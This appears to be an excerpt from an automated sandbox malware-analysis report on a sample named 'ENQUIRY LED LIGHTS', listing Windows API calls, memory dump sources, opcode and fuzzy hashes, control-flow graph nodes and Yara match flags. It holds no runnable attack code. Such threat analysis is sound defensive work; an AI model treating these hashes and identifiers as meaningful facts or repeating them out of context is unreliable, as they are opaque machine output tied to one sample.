                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Current$ProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2063062207-0

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00CED13E
                                                                                                  • GetCurrentThread.KERNEL32 ref: 00CED17B
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00CED1B8
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00CED211
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Current$ProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2063062207-0

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00CEB07E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04C11A02
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: be0f206b383f89600b0eb34520148a49cddf2d0e8ecad9b7d65d215f3d8b612f
                                                                                                  • Instruction ID: 2defabd324e1d5d3d91a0fc7480ddfe55a3e21a807a28923e0b1023df4cfdebb
                                                                                                  • Opcode Fuzzy Hash: be0f206b383f89600b0eb34520148a49cddf2d0e8ecad9b7d65d215f3d8b612f
                                                                                                  • Instruction Fuzzy Hash: 8B51C4B1D10349DFDB14CF99D484ADDBFB6BF49310F24812AE819AB210D775A945CF50

                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04C11A02
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: d079e04e64a299c2186e0dc14f714c5c36a21aaa16fffa0ed7cb78b3eb68815d
                                                                                                  • Instruction ID: e5a511da3e8596da8a25c7b40e89f2e79a42e7f75db5f6571c0a734dd61f9d8d
                                                                                                  • Opcode Fuzzy Hash: d079e04e64a299c2186e0dc14f714c5c36a21aaa16fffa0ed7cb78b3eb68815d
                                                                                                  • Instruction Fuzzy Hash: 0841C3B1D00349DFDB14CF99C884ADEBFB6BF49310F24812AE819AB210D775A945CF50

                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00CE59C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: 1c320a599a73afaa0cf84d6d8ef62578c32b9d5152318aeb306766bf20281c00
                                                                                                  • Instruction ID: 4a966e42c7fd722e2d86c7213b648884819f0c6513b51f07f54d746d97130156
                                                                                                  • Opcode Fuzzy Hash: 1c320a599a73afaa0cf84d6d8ef62578c32b9d5152318aeb306766bf20281c00
                                                                                                  • Instruction Fuzzy Hash: E741D0B0D0075DCADB24CFAAC884ADEBBF5BF48314F20816AD408AB251DB756946CF90

                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00CE59C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: b840bbbac754cae5bff435e06fd98d52434490b3aee159f053be225a25c56582
                                                                                                  • Instruction ID: 98651676c0624ba7be87a54db00e679061ac86452501efb8d979dd1e2d6dcb8d
                                                                                                  • Opcode Fuzzy Hash: b840bbbac754cae5bff435e06fd98d52434490b3aee159f053be225a25c56582
                                                                                                  • Instruction Fuzzy Hash: 3441D2B0D00759CEDB24CFAAC885BDEBBF5BF49314F20816AD408AB251DB756946CF50

                                                                                                  APIs
                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04C14101
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallProcWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2714655100-0
                                                                                                  • Opcode ID: 6522129b86f761a1afeda5e1013a59b0b561af6a84d04f4b4d0bcd489c657b2c
                                                                                                  • Instruction ID: 102131b199b503b69e519a218d646ed5117e775825986756557c5ce782bff419
                                                                                                  • Opcode Fuzzy Hash: 6522129b86f761a1afeda5e1013a59b0b561af6a84d04f4b4d0bcd489c657b2c
                                                                                                  • Instruction Fuzzy Hash: F2413CB8A00359CFCB14CF99C448A9ABBF6FF89314F24C459D519AB321D735A941CFA4

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFromIconResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668623891-0
                                                                                                  • Opcode ID: 83fc3170b372c7a973c36671480e4e62a9df8762222912f973a8a221e561252e
                                                                                                  • Instruction ID: 5c61c5e412a9aeedfcadb9a4ebd4c3e9c7d3697f61e05a97408e9f86f1e3e87d
                                                                                                  • Opcode Fuzzy Hash: 83fc3170b372c7a973c36671480e4e62a9df8762222912f973a8a221e561252e
                                                                                                  • Instruction Fuzzy Hash: C3319A719052889FCB01CFA9C844AEEBFF9EF09310F14805AE514AB221C336A955DFA1
                                                                                                  APIs
                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,04C1A68A,?,?,?,?,?), ref: 04C1A72F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFromIconResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668623891-0
                                                                                                  • Opcode ID: 76311ae5ee4bbc105c4f2c5b9f4f03fbd1bd52e22fdd072ce3e3e7c50f3ee532
                                                                                                  • Instruction ID: e6f86d8bfdcbf00c09791ec9af8f0c94da7732dc9a72ea5321c5369230f81da5
                                                                                                  • Opcode Fuzzy Hash: 76311ae5ee4bbc105c4f2c5b9f4f03fbd1bd52e22fdd072ce3e3e7c50f3ee532
                                                                                                  • Instruction Fuzzy Hash: 16218CB5900259DFDB10CFAAC884BEEBFF8EF49320F24841AE554A7210D335A945DFA5

                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CED797
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: 8ed86e887fc1451c6b6963f7f237249ea59f29fe3d5cc654de28308356a285f1
                                                                                                  • Instruction ID: 58d79d807bc9fe0c5b3f65d731f2ec639b90190e140797235597ec1d5721c8db
                                                                                                  • Opcode Fuzzy Hash: 8ed86e887fc1451c6b6963f7f237249ea59f29fe3d5cc654de28308356a285f1
                                                                                                  • Instruction Fuzzy Hash: 0021E3B5900249EFDB10CFAAD984AEEFFF8EB48320F14845AE914A7250D374A945CF65
                                                                                                  APIs
                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CED797
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DuplicateHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 3793708945-0
                                                                                                  • Opcode ID: ea2a30b64773966a1cfd2603411c6bdaee54c332fd5fefbeedc9da8ce7d5842b
                                                                                                  • Instruction ID: 990018295ba92b58a9ecc02272fca0856c24492ad37a867acec93907dcc263dd
                                                                                                  • Opcode Fuzzy Hash: ea2a30b64773966a1cfd2603411c6bdaee54c332fd5fefbeedc9da8ce7d5842b
                                                                                                  • Instruction Fuzzy Hash: ED21C4B5900248DFDB10CF9AD984ADEBBF8EB48320F14845AE914A7350D375A954CF65
                                                                                                  APIs
                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,04C1A68A,?,?,?,?,?), ref: 04C1A72F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFromIconResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668623891-0
                                                                                                  • Opcode ID: 4233d619126baa9ec681f66e7fc3cf4b3cd788609d72077634940b51838d3447
                                                                                                  • Instruction ID: 5260b837c41e3806618551cb1dcb949bd1c9cbddceef5a27ec3a06bdfd3bd216
                                                                                                  • Opcode Fuzzy Hash: 4233d619126baa9ec681f66e7fc3cf4b3cd788609d72077634940b51838d3447
                                                                                                  • Instruction Fuzzy Hash: 541126B5900249DFDB10CFAAD848BEEBFF9EB48320F14841AE914A7210D375A954DFA5
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00CEB07E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: 134899ecb35ff577f5da4dbc7e2a365d0b0af27be25fce12a33f61904abf7ac7
                                                                                                  • Instruction ID: 17a13430c73fe810a71496b9830072dd0317decb5f4804988e3593d3b489517a
                                                                                                  • Opcode Fuzzy Hash: 134899ecb35ff577f5da4dbc7e2a365d0b0af27be25fce12a33f61904abf7ac7
                                                                                                  • Instruction Fuzzy Hash: 1F11D2B5C006898FCB20CF9AD444A9FFBF4EB88324F14845AD429A7610D379AA45CFA1
                                                                                                  • Instruction Fuzzy Hash: C5210771505240DFDB24DF25D5C0B26BBA5FB88315F24C96DDD094B296C33AD80BCB61
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731260365.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_95d000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9653f8d5ecada623100e8c6b84887df8c8e20d08e4fa5f042e1c443e329842de
                                                                                                  • Instruction ID: 775f0dc26dac41fac21c4fee6bfa9bc05605bf26b6f24e1395804529b05bfabf
                                                                                                  • Opcode Fuzzy Hash: 9653f8d5ecada623100e8c6b84887df8c8e20d08e4fa5f042e1c443e329842de
                                                                                                  • Instruction Fuzzy Hash: D52184755093C0CFDB16CF24D994B15BF71EB46314F28C5DAD8498B6A7C33A980ACB62
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731213777.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_94d000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 083a0aad303073c06da1a146aa343d8be4e7eaa9cc126e7cc12db35873612b5c
                                                                                                  • Instruction ID: fda5eb0cfd8d3d3566b7f546a8e3901ee101c8400712e923892b582ef734c6a0
                                                                                                  • Opcode Fuzzy Hash: 083a0aad303073c06da1a146aa343d8be4e7eaa9cc126e7cc12db35873612b5c
                                                                                                  • Instruction Fuzzy Hash: CD21B176504280DFDB16CF50D9C4B16BF72FB84314F24C6A9DD094B656C37AD82ACBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731213777.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_94d000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                  • Instruction ID: 0b722a354e866d7fa94f0bde33e3a71bae8cbf165b559a33f55bd274dd909b3f
                                                                                                  • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                                  • Instruction Fuzzy Hash: 0C112676504280CFDB12CF10D5C0F16BF71FB94314F24C6A9E8094B25AC33AD85ACBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731260365.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_95d000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                                  • Instruction ID: bdf4bb6f4f29b98ffb85737709bfcaeb2d25446d305192df4a484065f4ac9829
                                                                                                  • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                                  • Instruction Fuzzy Hash: 8711BB75504280DFDB22CF10C5C0B15BBA1FB84314F24C6ADDC494B296C33AD84ACB61
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ac1e2ca4459615527c03222bd4864bd2f593cd8d5459acdeb830d3e96116afc2
                                                                                                  • Instruction ID: dfcd0cb556af55aa0b702901351a74a4a286399ea479b0124e2ba4aae25e50d3
                                                                                                  • Opcode Fuzzy Hash: ac1e2ca4459615527c03222bd4864bd2f593cd8d5459acdeb830d3e96116afc2
                                                                                                  • Instruction Fuzzy Hash: 861262B0401F478AD710CF65FD4C9893BB1B795328B904209D262AB3F9DBB925DACF64
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1731621322.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_ce0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bc4c6effb40b8aa68245237b750e6966a51c0a80ec445e31c6ada8d09f568b5d
                                                                                                  • Instruction ID: 045ae671839493fb9c049d5e938d6ac56d86ae5cf3b12796f7416a041eca77d9
                                                                                                  • Opcode Fuzzy Hash: bc4c6effb40b8aa68245237b750e6966a51c0a80ec445e31c6ada8d09f568b5d
                                                                                                  • Instruction Fuzzy Hash: 86A16D36E0024A8FCF15DFA6C84059EB7B2FF85300B15857EE915AB261DB71EE16CB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1736510069.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4c10000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: aba7884097a6a97ca4f153aa859cf5524d3ef6292499d574976526065e803a35
                                                                                                  • Instruction ID: 74cb26c2d78ae71babd60829957a1ca52e6fbf6bb63aca070f4eeeaad11e2582
                                                                                                  • Opcode Fuzzy Hash: aba7884097a6a97ca4f153aa859cf5524d3ef6292499d574976526065e803a35
                                                                                                  • Instruction Fuzzy Hash: AEC1E7B0801B478BD710CF65FD889897BB1BB95314B644309D162AB3F9DBB824DACF64

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.2%
                                                                                                  Dynamic/Decrypted Code Coverage:5.3%
                                                                                                  Signature Coverage:9.2%
                                                                                                  Total number of Nodes:131
                                                                                                  Total number of Limit Nodes:9

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 67 417f8f-417fb8 call 42fc2f 70 417fba-417fbd 67->70 71 417fbe-417fcc call 43016f 67->71 74 417fdc-417fed call 42e5af 71->74 75 417fce-417fd9 call 43040f 71->75 80 418006-418009 74->80 81 417fef-418003 LdrLoadDll 74->81 75->74 81->80
                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418001
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 87 42ce6f-42ceab call 4050ff call 42e0af NtClose
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CEA6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 101 2f52b60-2f52b6c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 102 2f52c70-2f52c7c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 103 2f52df0-2f52dfc LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 104 2f535c0-2f535cc LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(34R62IL6,00000111,00000000,00000000), ref: 004148D6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: *-?$34R62IL6$34R62IL6

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 16 414770-41477c 17 4147e1-4147eb 16->17 18 4147df 16->18 17->18 19 4147ed-414812 17->19 18->17 20 414814-414820 19->20 21 41488b-4148c9 call 417f8f call 40506f call 4256df 19->21 22 414822-414827 20->22 23 414868-41488a call 42efcf call 42f9df 20->23 34 4148e9-4148ef 21->34 35 4148cb-4148da PostThreadMessageW 21->35 23->21 35->34 36 4148dc-4148e6 35->36 36->34
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 34R62IL6$34R62IL6

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(34R62IL6,00000111,00000000,00000000), ref: 004148D6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 34R62IL6$34R62IL6

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 53 42d1df-42d220 call 4050ff call 42e0af RtlFreeHeap
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042D21B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID: lA

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 82 42d18f-42d1d3 call 4050ff call 42e0af RtlAllocateHeap
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(?,0041EDAA,?,?,00000000,?,0041EDAA,?,?,?), ref: 0042D1CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 92 42d22f-42d26b call 4050ff call 42e0af ExitProcess
                                                                                                  APIs
                                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,1AF49429,?,?,1AF49429), ref: 0042D266
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 97 2f52c0a-2f52c0f 98 2f52c11-2f52c18 97->98 99 2f52c1f-2f52c26 LdrInitializeThunk 97->99
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
